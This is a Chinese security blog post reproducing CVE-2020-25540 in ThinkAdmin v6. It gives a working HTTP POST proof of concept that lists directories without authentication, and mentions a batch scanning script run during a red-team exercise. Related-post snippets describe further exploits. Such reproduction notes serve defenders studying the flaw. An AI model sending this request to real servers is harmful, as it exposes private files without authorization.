Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现

最新推荐文章于 2024-01-05 11:40:00 发布
最新推荐文章于 2024-01-05 11:40:00 发布
阅读量240 收藏
点赞数
文章标签: python java 安全 数据库 c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811769
版权

v2-bd10a8a3fac97bbdfff234ba9fc1066c_b.jpg


Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现

快结束,抓住HVV的小尾巴,现在有空去复现最近出的漏洞

一、漏洞简介:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

二、漏洞成因:

github.com/zoujingli/Th

Update.php中的函数方法未授权,可直接函数可直接调用。导致漏洞

三、影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

四、漏洞复现:

POC:

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22​rules=%5B%22.%2F%22%5D

简单写了一个批量的小脚本


v2-79de99708e9dd61985d9fda2900ca866_b.png


跑了一部分,成功的不多,HVV尾声了,情况也正常。


v2-453706602f0ad9a34a3d79d02d0649af_b.jpg


发现一个诡异的地方:burp直接放包不能成功回去json的返回数据


v2-9e3f6d250f3ff5d8fd445942f79b7300_b.jpg


python-尝试python的request的post方法可以返回


v2-f2410a45d9374ccde5bda6d7c222d6c1_b.jpg


尝试curl的post的方法可以正常返回数据


v2-6b093c0c44a19df2eaa93ffedbb1423e_b.jpg


下来再来研究这个问题。

五、修复方案:

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本

六、参考链接:

github.com/zoujingli/Th

mp.weixin.qq.com/s/1tm8

cnblogs.com/fan-gx/p/12

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!


v2-c80c87cb78cf66222785b2baa2a6c6f9_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

个人CSDN:blog.csdn.net/qq_376027

原文连接:mp.weixin.qq.com/s/Gr5y


v2-e0038f5515df1ac5006bb633bd45db6e_b.jpg

thelostworld-公众号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkAdminCVE-2020-25540)漏洞
m0_48520508的博客
11-09 1869
0x00简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 非常适用快速二次开发,默认集成 微信开发组件,支持微信服务号,微信支付,支付宝支付,阿里云OSS存储,七牛云存储,本地服务器存储。,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未
ThinkAdmin漏洞CVE-2020-25540 )
锋刃科技的博客
10-18 5169
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
CVE-2020-25540)Thinkadmin v6任意文件读取漏洞
thelostworld
09-24 897
Thinkadmin v6任意文件读取漏洞CVE-2020-25540) ​ 快结束,抓住HVV的小尾巴,在有空去最近出的漏洞 一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、..
ThinkAdmin列目录/任意文件读取CVE-2020-25540 )漏洞及环境搭建
yzl_007的博客
08-03 2316
ThinkAdmin列目录/任意文件读取CVE-2020-25540 )漏洞 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin ≤ 2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发没有,按照要求
CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞
Jietewang的博客
12-11 2839
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin ≤ 2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
ThinkAdmin后台管理系统
08-07
Think Admin 1.0 基于ThinkPHP5开发,初始的1.0版本没有开发成CMS,只是个后台管理系统,附带常用的功能,方便扩展使用。
ApiAdmin:基于ThinkPHP V6。*开发的面向API的后台管理系统!
01-28
-笔者站在巨人的顶端上,并非高的表,反而使自己变得渺小〜只有吸收了巨人的营养,茁壮自己才是真正的高大! 管理员 前置页面 ApiAdmin5.0是一个前后端完全分离的项目,前端采用Vue的构建,如需要可视化配置的请移步: 快速安装 初步:安装代码 composer create-project apiadmin/apiadmin 你也可以:先获取基础代码 git clone https://gitee.com/apiadmin/ApiAdmin.git 再使用composer安装 composer install 第二步:检测环境以及配置数据库 php think apiadmin:install 第三步:完成数据迁移 php think migrate:run * 如出报错:There are no commands defined in the "migrate" namespace. * 请先更新下think版本:composer update topthink/framework * 再执行:php think migrate:run * 特别鸣谢:@孙晔华 第四步:
mysql blob图片类型存储bug解决:索引超出了数组界限错误,MySql Blob图片类型存储Bug解决:索引超出了数组界限错误_MySQL...
weixin_29169899的博客
03-17 158
告别了一周多的网络,终于回归,突见群里,有网友提了以下问题:CYQ.Data框架测试:mysql数据库测试(保存blob类型的数据会出问题) ,针对mysql数据库做测试:发更新blog字段,总是保存System.Byte[]既然网友提出了问题,本地再试验一下: 先在本地装了个Mysql,又装了个navicat管理工具,又新建了个工程来测试:简单的测试方法,就是放一个按钮,点击一...
Thinksns微博系统注入漏洞即后台拿webshell
收集盒 Book box
09-20 1804
Exp: http://www.site.com/index.php?app=blog&mod=Index&act=show&id=1101 注入点注入字段 表ts_user `uid` int(11) NOT NULL AUTO_INCREMENT, `email` varchar(255) DEFAULT NULL, `password` varchar(255
Blob分析--检测漏锡
weixin_45590420的博客
01-29 229
* board.hdev: Detection of missing solder * 检测漏锡 *知识点 *difference(region1,region2, )求1减去2的差,即1有2没有的部分 *complement(region1,region2, )求1对2的补,前提必须1包含2,否则无法求补 *intersection(region1,region2 )求1和2的交 *union1(region1, )将1里的所有区域联合成一个连通域 *union2(region1,region2, )求.
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4631
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
云镜CVE-2020-25540
m0_46684679的博客
02-26 578
Thinkadmin v6任意文件读取漏洞
记一次对某个未成年禁入app的渗透测试
最新发布
渗透测试研究中心
01-05 811
0x01 thinkadmin历史漏洞习已经找到对方的app的后台地址是thinkadmin,因此我们需要去thinkadmin的历史漏洞CVE-2020-25540https://github.com/zoujingli/ThinkAdmin/issues/244利用POC如下https://github.com/Schira4396/CVE-2020-25540列目录POST /?s...
ThinkAdmin6部分
three_six_nine__的博客
08-06 1116
ThinkAdmin6
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
mkdocs是一款流行的静态网站生成器,它可以将Markdown格式的文档转换成HTML网页。不幸的是,mkdocs的1.2.2版本存在一个漏洞CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,导致攻击者可以在请求参数中注入恶意内容。 为了利用这个漏洞,攻击者需要发送一个带有特定参数的HTTP请求。参数中包含了“../”这个字符串,意味着攻击者可以访问服务器上根目录之外的文件。通过不断利用目录遍历漏洞,攻击者可以找到并读取服务器上的敏感文件,例如配置文件、密码文件等。这个漏洞对于那些使用mkdocs作为网站生成器并使用内置开发服务器的用户来说,非常严重,因为攻击者可以轻易地获取到他们的网站源码和其他敏感信息。 为了避免这个漏洞,用户可以升级到mkdocs的最新版本,或者使用其他的静态网站生成器。此外,也可以使用专门的Web服务器来代替mkdocs内置的开发服务器。在配置Web服务器时,用户应该注意避免目录遍历漏洞和其他网络安全问题。通过正确地配置Web服务器,用户可以增强他们网站的安全性,并避免潜在的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值